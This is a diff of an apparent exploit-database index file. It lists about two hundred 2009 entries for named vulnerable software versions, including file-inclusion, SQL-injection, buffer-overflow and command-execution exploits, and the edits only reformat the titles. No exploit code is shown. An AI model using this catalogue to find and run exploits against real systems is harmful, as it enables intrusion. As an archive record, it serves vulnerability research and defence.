7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion Vulnerabilities",2009-02-04,fuzion,php,webapps,0 -7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 +7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion Vulnerabilities",2009-02-04,make0day,php,webapps,0 -7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 +7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (DD/XSS) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - (DD/XSS) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 -7984,platforms/php/webapps/7984.pl,"YapBB <= 1.2 (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 +7984,platforms/php/webapps/7984.pl,"YapBB <= 1.2 - (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 7985,platforms/windows/dos/7985.pl,"Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 -7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 (Authorization) Stack BoF PoC",2009-02-04,"Praveen Darshanam",windows,dos,0 +7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack BoF PoC",2009-02-04,"Praveen Darshanam",windows,dos,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (upload/bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 -7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp)",2009-02-04,"Rob Carter",windows,remote,0 -7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (vista)",2009-02-04,"Rob Carter",windows,remote,0 +7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow Exploit (xp)",2009-02-04,"Rob Carter",windows,remote,0 +7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow Exploit (vista)",2009-02-04,"Rob Carter",windows,remote,0 7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC",2009-02-04,"Andres Luksenberg",windows,dos,0 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 beta (Auth Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities",2009-02-05,SirGod,php,webapps,0 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - (XSS/LFI/DD) Multiple Vulnerabilities",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow Exploit",2009-02-05,SimO-s0fT,windows,local,0 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 outline Tag Buffer Overflow Exploit PoC",2009-02-05,"Praveen Darshanam",windows,dos,0 -7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 +7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 @@ -7532,13 +7532,13 @@ id,file,description,date,author,platform,type,port 8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) Remote SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS <= 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 -8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 +8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Remote File Upload",2009-02-09,fantastic,php,webapps,0 -8007,platforms/php/webapps/8007.php,"IF-CMS <= 2.0 (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 +8007,platforms/php/webapps/8007.php,"IF-CMS <= 2.0 - (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router DoS",2009-02-09,Rembrandt,hardware,dos,0 8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 -8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 (id) Remote SQL Injection",2009-02-09,K-159,php,webapps,0 +8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 - (id) Remote SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - (.JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 @@ -7546,7 +7546,7 @@ id,file,description,date,author,platform,type,port 8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 - (XSS/RFI) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - (RFI/XSS) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8018,platforms/php/webapps/8018.txt,"FlexCMS (catId) Remote SQL Injection",2009-02-09,MisterRichard,php,webapps,0 -8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) XSS",2009-02-09,make0day,php,webapps,0 +8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 - (09.01.22) XSS",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC <= 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit",2009-02-09,"Praveen Darshanam",multiple,dos,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0 @@ -7554,34 +7554,34 @@ id,file,description,date,author,platform,type,port 8024,platforms/windows/dos/8024.py,"TightVNC Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion Vulnerabilities",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 -8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 +8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - (LFI) Remote Command Execution Exploit",2009-02-09,Osirys,php,webapps,0 -8029,platforms/php/webapps/8029.txt,"Thyme <= 1.3 (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 -8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 +8029,platforms/php/webapps/8029.txt,"Thyme <= 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 +8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution Exploit",2009-02-10,Fireshot,php,webapps,0 -8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0 -8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 (Auth Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 -8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 +8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0 +8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - (Auth Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 +8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Auth Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0 8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 -8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0 +8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System - (geohttpserver) DT",2009-02-11,"Dejan Levaja",windows,remote,0 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - (XSS/SQL/dd) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - (searchmatch.php) SQL Injection",2009-02-11,nuclear,php,webapps,0 -8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 (query) Remote SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 +8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) Remote SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Auth Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulnerabilities",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (LFI/SQL) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 -8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 (id) Remote SQL Injection",2009-02-13,JIKO,php,webapps,0 +8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - (id) Remote SQL Injection",2009-02-13,JIKO,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote FD / SQL Injection Exploit",2009-02-13,Osirys,php,webapps,0 -8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 (info.php item) SQL Command Injection Exploit",2009-02-13,Osirys,php,webapps,0 +8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - (info.php item) SQL Command Injection Exploit",2009-02-13,Osirys,php,webapps,0 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Local Privilege Escalation Exploit",2009-02-16,kingcope,freebsd,local,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS",2009-02-16,rAWjAW,php,webapps,0 8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0 @@ -7598,8 +7598,8 @@ id,file,description,date,author,platform,type,port 8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Auth Bypass by Cookie SQL Injection",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System Remote Shell Upload",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 -8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 (header.php mod) SQL Injection",2009-02-17,x0r,php,webapps,0 -8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 (genbackup.php) Database Disclosure",2009-02-17,x0r,php,webapps,0 +8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - (header.php mod) SQL Injection",2009-02-17,x0r,php,webapps,0 +8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - (genbackup.php) Database Disclosure",2009-02-17,x0r,php,webapps,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (Metasploit)",2009-02-18,sh2kerr,multiple,local,0 8075,platforms/php/webapps/8075.pl,"Firepack (admin/ref.php) Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 @@ -7607,7 +7607,7 @@ id,file,description,date,author,platform,type,port 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 -8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include",2009-02-20,Kacper,php,webapps,0 +8083,platforms/php/webapps/8083.txt,"phpBB 3 - (autopost bot mod <= 0.1.3) Remote File Include",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 @@ -7615,22 +7615,22 @@ id,file,description,date,author,platform,type,port 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 -8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0 -8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 (admin.php) No Authentication",2009-02-23,ahmadbady,php,webapps,0 -8093,platforms/php/webapps/8093.pl,"pPIM 1.01 (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 +8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0 +8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - (admin.php) No Authentication",2009-02-23,ahmadbady,php,webapps,0 +8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router Sms XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey <= 2.9.7 - HTTP DOUBLE SLASH Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 -8098,platforms/php/webapps/8098.txt,"taifajobs <= 1.0 (jobid) Remote SQL Injection",2009-02-23,K-159,php,webapps,0 +8098,platforms/php/webapps/8098.txt,"taifajobs <= 1.0 - (jobid) Remote SQL Injection",2009-02-23,K-159,php,webapps,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) (0Day)",2009-02-23,"Guido Landi",windows,dos,0 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery (pid) Remote SQL Injection Exploit",2009-02-23,StAkeR,php,webapps,0 -8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 (Auth Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0 +8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Auth Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 8104,platforms/php/webapps/8104.txt,"Qwerty CMS (id) Remote SQL Injection",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 -8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 (Auth Bypass) Remote SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 +8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Auth Bypass) Remote SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 8108,platforms/osx/local/8108.c,"Apple MACOS X xnu <= 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 @@ -7639,7 +7639,7 @@ id,file,description,date,author,platform,type,port 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions Newsletter Manager Pro - Auth Bypass",2009-02-26,ByALBAYX,asp,webapps,0 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery <= 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery <= 1.4.20 - (IMG) Privilege Escalation Exploit",2009-02-26,Inphex,php,webapps,0 -8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 (Auth Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 +8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Auth Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 8118,platforms/windows/remote/8118.html,"Orbit <= 2.8.4 Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 @@ -7654,7 +7654,7 @@ id,file,description,date,author,platform,type,port 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp imageLibrary Arbitrary ASP Shell Upload",2009-03-02,mr.al7rbi,asp,webapps,0 -8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 +8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL/CH) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla com_digistore (pid) Blind SQL Injection Exploit",2009-03-02,InjEctOr5,php,webapps,0 8135,platforms/windows/dos/8135.pl,"Media Commands - (M3U & M3l & TXT & LRC Files) Local Heap Overflow PoC",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla/Mambo Component eXtplorer Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 @@ -7667,9 +7667,9 @@ id,file,description,date,author,platform,type,port 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control (sopocx.ocx) Command Execution Exploit",2009-03-03,Nine:Situations:Group,windows,remote,0 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 8145,platforms/php/webapps/8145.txt,"ghostscripter Amazon Shop - (XSS/DT/RFI) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 -8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 (multiple headers) Remote Denial of Service Exploit",2009-03-03,"Praveen Darshanam",multiple,dos,0 +8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (multiple headers) Remote Denial of Service Exploit",2009-03-03,"Praveen Darshanam",multiple,dos,0 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass",2009-03-03,Stack,windows,remote,0 -8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS",2009-03-03,Pepelux,php,webapps,0 +8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 - (message) Persistent XSS",2009-03-03,Pepelux,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow Exploit (Perl)",2009-03-04,Dr4sH,windows,remote,80 @@ -7687,18 +7687,18 @@ id,file,description,date,author,platform,type,port 8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - (praises.php id) Remote SQL Injection",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk <= 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 -8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 +8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 - (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8172,platforms/php/webapps/8172.txt,"cms s.builder <= 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - (.RAP) Local Stack Overflow Exploit",2009-03-09,zAx,windows,local,0 -8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 +8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 - (m3u File) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 8179,platforms/windows/local/8179.rb,"MediaCoder 0.6.2.4275 - Universal Buffer Overflow Exploit (SEH)",2009-03-09,Stack,windows,local,0 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 -8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 -8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 (base_id) Remote SQL Injection",2009-03-09,d3b4g,php,webapps,0 +8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 - (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 +8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - (base_id) Remote SQL Injection",2009-03-09,d3b4g,php,webapps,0 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 @@ -7708,12 +7708,12 @@ id,file,description,date,author,platform,type,port 8189,platforms/windows/local/8189.txt,"VUPlayer <= 2.49 - (.cue) Universal Buffer Overflow Exploit",2009-03-10,Stack,windows,local,0 8190,platforms/windows/dos/8190.txt,"IBM Director <= 5.20.3su2 CIM Server Remote DoS",2009-03-10,"Bernhard Mueller",windows,dos,0 8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 -8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 (playlist) Universal SEH Overwrite Exploit",2009-03-10,His0k4,windows,local,0 +8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (playlist) Universal SEH Overwrite Exploit",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 8195,platforms/php/webapps/8195.txt,"WeBid <= 0.7.3 RC9 - Multiple Remote File Inclusion 